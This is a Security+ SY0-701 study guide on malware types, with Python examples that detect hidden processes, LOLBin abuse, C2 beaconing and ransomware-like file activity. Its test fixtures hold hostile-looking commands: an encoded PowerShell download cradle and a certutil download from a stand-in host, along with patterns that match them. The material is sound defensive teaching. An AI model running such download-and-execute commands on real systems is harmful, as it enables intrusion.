
Malware Types Explained for Security+ 701

Study Guide Cert Sensei Team 2027-07-26 8 min read

Malware types for the Security+ 701 exam include worms (self-replicating), trojans (disguised as legitimate software), and ransomware (encrypting data for payment). Advanced threats like rootkits, bootkits, and fileless malware use stealth and system binaries to evade detection, requiring a combination of behavioral analysis and endpoint detection and response (EDR) tools.

#CompTIA Security+ #SY0-701 #malware types #cybersecurity study guide

What is the difference between worms, trojans, and ransomware?

When you're staring at a Security+ scenario, the first thing to identify is the delivery and propagation method. Worms are the 'loners' of the malware world: they are self-replicating and spread across networks without any human interaction by exploiting vulnerabilities in network-facing services such as SMB. If the question mentions 'rapid spread across the subnet' with nobody clicking anything, think worm.

Trojans, conversely, rely on deception. They masquerade as helpful software, like a free PDF converter, to trick you into executing them; unlike worms, they do not self-replicate, and the 'trojan' label describes the delivery disguise rather than what the payload does once it runs. Ransomware is the 'extortionist': it encrypts your files and demands payment, usually in cryptocurrency, for the decryption key. Most families use hybrid encryption, a fast symmetric cipher for the file contents with the symmetric keys wrapped by the attacker's public key, so only the holder of the matching private key can release them. To master these distinctions, we recommend drilling through our 1,000 expert-curated practice questions, which force you to apply these definitions to real-world attack scenarios.

How do rootkits and bootkits evade detection?

These are the 'ninjas' of malware. A rootkit hides its presence by replacing or hooking the components the rest of the system trusts: user-mode rootkits patch system binaries and libraries, while kernel-mode rootkits hook the kernel itself. If you ask the OS 'What processes are running?', the rootkit intercepts that request and removes itself from the list before you see it. This is why standard antivirus often fails: the malware is lying to the tool, so any check that relies on the compromised OS's own answers can be fooled. Practitioners counter this by comparing independent views of the same data (a cross-view check) or by inspecting the disk and memory from a trusted environment booted from clean media.
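As an added example that is not part of the original guide, the Python script below implements the cross-view check on Linux: it compares the PIDs that /proc lists (what ps relies on) with the PIDs that answer to kill(pid, 0), and treats anything the probe finds but the listing omits as a suspect. The LISTED_VIEW and PROBED_VIEW sets are constructed to simulate a rootkit hiding PID 4242; the cap on the PID range and the two-round confirmation are choices made for this example, not kernel limits.

```python
"""Cross-view detection of hidden processes on Linux (added example).

A rootkit that filters the process listing (what `ps` reads from /proc)
rarely filters every other way of asking. kill(pid, 0) sends no signal but
reports whether the PID exists, so probing every PID gives a second view.
"""
import os


def list_proc_pids():
    """The 'official' view: numeric directory names under /proc."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def probe_pids(max_pid=None):
    """The independent view: every PID that answers to signal 0.
    PermissionError (EPERM) still means the process exists; only
    ProcessLookupError (ESRCH) means it does not."""
    if max_pid is None:
        try:
            with open("/proc/sys/kernel/pid_max") as f:
                max_pid = int(f.read())
        except OSError:
            max_pid = 32768
        max_pid = min(max_pid, 1 << 16)  # cap for speed (assumption, not a kernel limit)
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
            alive.add(pid)
        except PermissionError:
            alive.add(pid)
        except ProcessLookupError:
            pass
    return alive


def is_thread_id(pid):
    """On Linux kill() also accepts thread IDs, which /proc does not list at the
    top level. /proc/<tid>/status stays readable even when readdir hides it,
    and its Tgid line names the owning process, so threads are not 'hidden'."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) != pid
    except OSError:
        pass
    return False


def find_hidden(listed, probed, is_thread=lambda pid: False):
    """Pure comparison: PIDs the probe found that the listing omitted."""
    return sorted(pid for pid in set(probed) - set(listed) if not is_thread(pid))


def confirm_hidden(collect_listed, collect_probed, rounds=2, is_thread=lambda pid: False):
    """A process that exits between the two snapshots looks hidden for one
    round. A rootkit hides consistently, so only flag PIDs seen in every round."""
    suspects = None
    for _ in range(rounds):
        hidden = set(find_hidden(collect_listed(), collect_probed(), is_thread))
        suspects = hidden if suspects is None else suspects & hidden
    return sorted(suspects)


# Constructed snapshots (not real data): the listing omits PID 4242.
LISTED_VIEW = {1, 2, 100, 1337, 2001}
PROBED_VIEW = {1, 2, 100, 1337, 2001, 4242}

if __name__ == "__main__":
    print("constructed views, hidden:", find_hidden(LISTED_VIEW, PROBED_VIEW))
    if os.path.isdir("/proc"):
        print("live scan, hidden:", confirm_hidden(list_proc_pids, probe_pids, is_thread=is_thread_id))
```

Run the live scan as root for an unfiltered view. A rootkit that also hooks kill() or the /proc lookup path defeats this particular pair of views, which is why production tools, and the exam's 'offline scanner' answer, fall back to examining the disk and memory from a clean boot.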

Bootkits take this a step further by infecting the Master Boot Record (MBR) on legacy BIOS systems, the bootloader on the EFI System Partition, or the UEFI firmware itself. Because they load before the operating system even starts, they can compromise the entire boot sequence, including the kernel that will later be asked whether anything is hidden. To defend against these you need hardware-rooted trust: UEFI Secure Boot refuses to run boot components that are not signed by a trusted key, and a TPM-backed Measured Boot records a hash of each boot stage so that tampering can be detected locally or attested to remotely. In your studies, focus on the concept of 'persistence': these tools aren't just about stealing data; they're about staying hidden for months or years.

What exactly is fileless malware and LotL?

Modern attackers have realized that writing a .exe file to disk is a great way to get caught by an EDR. Enter fileless malware. The payload executes in memory, often via scripts (PowerShell, VBScript) or code injected into a legitimate process; any persistence it needs is tucked into the registry, a scheduled task, or a WMI event subscription rather than an executable on disk. Because there is no 'file' to scan, traditional signature-based AV has nothing to match.

This leads us to 'living off the land' (LotL) and the LOLBins attackers favor. They use legitimate, pre-installed system tools, like certutil.exe (which can download files or base64-decode a payload) or wmic.exe (which can launch processes locally or remotely), to perform malicious actions. They aren't bringing their own tools; they're using yours against you. To catch this, you must move from signature-based detection to behavioral analysis: look for unusual parent-child process relationships, such as a Word document launching a PowerShell instance, and for suspicious command lines, such as an encoded PowerShell command or certutil fetching a URL.
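To make the parent-child idea concrete, here is an added example (not code from the original post) that runs a handful of process-tree and command-line heuristics over Sysmon-style process-creation records. The four SAMPLE_EVENTS are constructed, the 203.0.113.9 address is from a documentation range, and the rule names are chosen for this example.

```python
"""Parent/child and command-line heuristics for LOLBin abuse (added example).

Input is a list of Sysmon-style process-creation records (Event ID 1 carries
Image, ParentImage and CommandLine); the sample records below are constructed.
"""
import base64
import re
from dataclasses import dataclass

# Document handlers that have no business spawning a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# The usual second stage of a macro or exploit.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Signed system binaries commonly repurposed to download, decode or launch payloads.
LOLBINS = {"certutil.exe", "wmic.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe", "mshta.exe"}


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line):
    """PowerShell's -e / -enc / -EncodedCommand takes base64 of UTF-16LE text
    (only these common spellings are handled here). Returns the decoded script,
    or None if the flag is absent or the payload is malformed."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return the names of the heuristics an event trips, in a fixed order."""
    hits = []
    child, parent, cmd = basename(event.image), basename(event.parent_image), event.command_line
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if child in LOLBINS:
        hits.append("lolbin_execution")
    if child == "certutil.exe" and re.search(r"(?i)-urlcache|-decode", cmd):
        hits.append("certutil_download_or_decode")
    if child == "wmic.exe" and re.search(r"(?i)process\s+call\s+create", cmd):
        hits.append("wmic_process_create")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("powershell_encoded_command")
        if re.search(r"(?i)downloadstring|invoke-expression|\biex\b", decoded):
            hits.append("encoded_download_cradle")
    return hits


def scan(events):
    """Map event index -> hits, keeping only events that tripped something."""
    results = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            results[i] = hits
    return results


# Constructed sample: what a macro-launched download cradle looks like in the log.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/stage2.ps1')"
ENCODED_CRADLE = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              f"powershell.exe -NoP -W Hidden -Enc {ENCODED_CRADLE}"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\explorer.exe",
              "certutil.exe -urlcache -split -f http://203.0.113.9/x.exe x.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Temp"'),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\cmd.exe",
              'wmic.exe process call create "calc.exe"'),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, basename(SAMPLE_EVENTS[idx].image), hits)
```

The point of decoding the -Enc payload before matching is that the attacker's obfuscation is what hides 'DownloadString' from a naive string search; an EDR that records the decoded script block (or Windows' own PowerShell script block logging) gives you the same view.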

How do you distinguish spyware from adware?

While both are often bundled together, their goals are different. Adware is primarily about revenue. It floods your browser with pop-ups and redirects your search queries to affiliate sites. It's annoying and degrades performance, but it's rarely the primary goal of a sophisticated APT.

Spyware is far more sinister. Its goal is covert data exfiltration: keyloggers that capture your passwords, screen scrapers that monitor your activity, and stealers that harvest saved browser credentials. Detection usually involves spotting unexpected outbound traffic to unknown command-and-control (C2) servers, in particular connections that recur on a fixed schedule (beaconing); unexplained CPU spikes are a weaker clue on their own. When studying for the 701, remember that removal often requires booting into Safe Mode or using an offline scanner so the malware is not running to protect its own registry keys and files.
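The beaconing signal is easy to compute from connection logs, so here is an added example (not from the original post) that groups outbound connections by source, destination and port, measures how regular the gaps between them are, and flags flows that recur on a tight schedule. The traffic in SAMPLE_RECORDS is constructed, the IP addresses come from documentation ranges, and the ALLOWLIST and thresholds are assumptions a real deployment would derive from a baseline period.

```python
"""Beacon detection over outbound connection records (added example).

Each record is (epoch_seconds, src_ip, dst_ip, dst_port); the sample traffic
below is constructed, not captured.
"""
from collections import defaultdict

# Destinations legitimately polled on a schedule (assumption: in practice this
# comes from asset inventory, threat intel or a baseline of normal traffic).
ALLOWLIST = {("198.51.100.20", 123)}


def _interval_stats(timestamps):
    """Mean inter-arrival time and its coefficient of variation (std/mean).
    A human browsing produces ragged gaps; an implant on a sleep timer produces
    gaps that cluster tightly around its period, even with a little jitter."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if not gaps:
        return 0.0, float("inf")
    mean = sum(gaps) / len(gaps)
    if mean == 0:
        return 0.0, float("inf")
    var = sum((g - mean) ** 2 for g in gaps) / len(gaps)
    return mean, (var ** 0.5) / mean


def detect_beacons(records, min_connections=8, max_cv=0.15):
    """Group by (src, dst, port); flag flows seen often enough, regular enough,
    and not on the allowlist. Returns one dict per flow, most regular first."""
    flows = defaultdict(list)
    for ts, src, dst, port in records:
        flows[(src, dst, port)].append(ts)
    hits = []
    for (src, dst, port), timestamps in flows.items():
        if len(timestamps) < min_connections or (dst, port) in ALLOWLIST:
            continue
        mean, cv = _interval_stats(timestamps)
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "port": port, "count": len(timestamps),
                         "period_s": round(mean, 1), "cv": round(cv, 4)})
    return sorted(hits, key=lambda h: h["cv"])


def _series(src, dst, port, start, gaps):
    """Build a constructed connection series from a start time and a list of gaps."""
    out, t = [(start, src, dst, port)], start
    for g in gaps:
        t += g
        out.append((t, src, dst, port))
    return out


SAMPLE_RECORDS = (
    # implant sleeping ~60 s with small jitter
    _series("10.0.0.5", "203.0.113.7", 443, 1_700_000_000,
            [60, 58, 62, 61, 59, 60, 63, 57, 60, 61, 59])
    # the same workstation browsing: ragged, human-driven gaps
    + _series("10.0.0.5", "198.51.100.8", 443, 1_700_000_010,
              [5, 120, 2, 400, 17, 900, 3, 45, 260, 8, 33])
    # NTP polling every 64 s: perfectly regular, but allowlisted
    + _series("10.0.0.5", "198.51.100.20", 123, 1_700_000_003, [64] * 11)
    # too few connections to judge yet
    + _series("10.0.0.9", "203.0.113.7", 443, 1_700_000_000, [30, 30])
)

if __name__ == "__main__":
    for hit in detect_beacons(SAMPLE_RECORDS):
        print(hit)
```

Expect false positives from anything else on a timer (update checks, monitoring agents), which is why the regularity score is a triage input to pair with destination reputation rather than a verdict. Implants that add large random jitter or vary their sleep will push the coefficient of variation above the threshold, so tune max_cv against a baseline and watch the longer-period, lower-volume flows as well.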

Which detection strategies work best for modern malware?

You cannot rely on a single tool. Signature-based detection is great for 'known' threats, but it is useless against polymorphic malware, which mutates or re-encodes its own code on each infection so that no two samples share a file hash. This is why the SY0-701 exam emphasizes heuristic and behavioral analysis: looking for 'malware-like' activity, such as a process that rapidly rewrites hundreds of documents with high-entropy content, rather than a specific file fingerprint.
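An added example (not from the original post) that shows both halves of this argument: a hash signature matches the constructed sample but not a trivially mutated copy of it, while a behavioral heuristic over file-activity events catches an encryptor by what it does (mass extension changes with near-random content). The SAMPLE bytes are a harmless stand-in, not malware, every event in SAMPLE_EVENTS is constructed, and the entropy floor and the threshold of five suspicious writes are assumptions.

```python
"""Why a file-hash signature misses a polymorphic variant while a behavioral
heuristic still fires (added example; every sample and event here is constructed).
"""
import hashlib
import math
import os
import random
from collections import Counter, defaultdict

# Stand-in for a malicious executable: not real malware, just bytes with a PE-like header.
SAMPLE = b"MZ" + b"\x90" * 64 + b"constructed stand-in for a malicious payload body"
KNOWN_BAD_SHA256 = {hashlib.sha256(SAMPLE).hexdigest()}  # what a signature database holds


def signature_match(data, known=KNOWN_BAD_SHA256):
    """Classic signature check: exact hash lookup."""
    return hashlib.sha256(data).hexdigest() in known


def polymorphic_variant(data, seed):
    """Toy mutation engine: keep the header, XOR the body with a per-infection key
    and store the key in a one-byte stub. Real engines re-encrypt and reorder code,
    but the effect on hash signatures is identical: every copy has a new fingerprint."""
    key = (seed & 0xFF) or 1
    header, body = data[:66], data[66:]
    return header + bytes([key]) + bytes(b ^ key for b in body)


def shannon_entropy(data):
    """Bits per byte, 0..8. Ciphertext and compressed data sit near 8;
    text, Office documents and most images sit well below."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def assess_file_activity(events, entropy_floor=7.0, min_suspicious=5):
    """events: (host, process, old_path, new_path, written_bytes) from a file monitor.
    A write is suspicious when it changes the extension AND the new content is
    near-random; a process doing that repeatedly looks like an encryptor, whatever
    its hash is. Returns one record per flagged (host, process)."""
    per_process = defaultdict(lambda: {"suspicious_writes": 0, "new_extensions": set()})
    for host, process, old_path, new_path, written in events:
        old_ext, new_ext = os.path.splitext(old_path)[1], os.path.splitext(new_path)[1]
        if new_ext != old_ext and shannon_entropy(written) >= entropy_floor:
            rec = per_process[(host, process)]
            rec["suspicious_writes"] += 1
            rec["new_extensions"].add(new_ext)
    return [{"host": h, "process": p, "suspicious_writes": r["suspicious_writes"],
             "new_extensions": sorted(r["new_extensions"])}
            for (h, p), r in sorted(per_process.items())
            if r["suspicious_writes"] >= min_suspicious]


# Constructed file-activity sample: a seeded RNG stands in for ciphertext.
_rng = random.Random(7)


def _ciphertext(n):
    return bytes(_rng.getrandbits(8) for _ in range(n))


_TEXT = b"Quarterly notes: revenue flat, hiring paused, review the vendor contract. " * 30

SAMPLE_EVENTS = (
    [("WS-04", "updater.exe", f"C:\\Users\\amy\\Docs\\report{i}.docx",
      f"C:\\Users\\amy\\Docs\\report{i}.docx.locked", _ciphertext(2048)) for i in range(8)]
    + [("WS-04", "WINWORD.EXE", "C:\\Users\\amy\\Docs\\notes.docx",
        "C:\\Users\\amy\\Docs\\notes.docx", _TEXT) for _ in range(3)]
    + [("WS-04", "editor.exe", "C:\\Users\\amy\\Docs\\todo.txt",
        "C:\\Users\\amy\\Docs\\todo.md", _TEXT)]
)

if __name__ == "__main__":
    print("original matches signature:", signature_match(SAMPLE))
    print("variant matches signature:", signature_match(polymorphic_variant(SAMPLE, 1)))
    print("behavioral verdicts:", assess_file_activity(SAMPLE_EVENTS))
```

The behavioral side is deliberately indifferent to which binary is doing the writing, which is what lets it catch a brand-new variant; the price is that a legitimate backup or archiving tool that compresses and renames files in bulk will trip the same rule, so canary files and a short allowlist of known tools usually sit alongside it.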

Implementing Endpoint Detection and Response (EDR) is the gold standard here. EDR provides the visibility needed to track fileless attacks and LotL binaries by logging process executions with their parent and command line, network connections, and file and registry changes, then correlating them across the fleet. At Cert Sensei, we provide domain-level analytics in our practice exams so you can see exactly where your knowledge gaps are in the 'Threats, Vulnerabilities, and Mitigations' domain, ensuring you don't walk into the exam with a blind spot.

How should you approach malware questions on the SY0-701 exam?

The CompTIA exams love to give you a story. To win, you need to identify the 'trigger words.' If the scenario mentions 'encrypted files' and 'Bitcoin,' it's ransomware. If it mentions processes or files that do not show up in the OS's own listings, or 'unauthorized access to the kernel,' it's a rootkit. If it mentions 'spreading via a network vulnerability without user interaction,' it's a worm.

Read the delivery mechanism carefully. A phishing email with a 'free tool' attachment is a classic trojan delivery. Once you identify the type, look for the most appropriate remediation. For ransomware, the answer is almost always 'isolate the host, then restore from offline backups' that the ransomware could not reach. Practice these patterns repeatedly using our custom quiz builder to filter specifically for malware-related objectives.

❓ Frequently Asked Questions

If a program looks like a game but steals passwords, is it a worm or a trojan?

It is a trojan. The defining characteristic is the deception—masquerading as something legitimate to trick the user into installing it. Worms do not need to pretend to be something else because they spread automatically via network exploits.


Can standard antivirus software detect fileless malware?

Generally, no. Traditional AV scans files on disk for known signatures. Since fileless malware lives in memory and uses legitimate system tools (LotL), you need EDR or behavioral analysis tools that monitor process memory, API calls, and command lines; on Windows, PowerShell script block logging also records the de-obfuscated script content that never touched disk.


What is the fastest way to stop a ransomware attack in progress?

The immediate priority is isolation. Disconnect the infected machine from the network (unplug the Ethernet cable or disable Wi-Fi) to prevent the ransomware from spreading to network shares or other hosts via SMB.
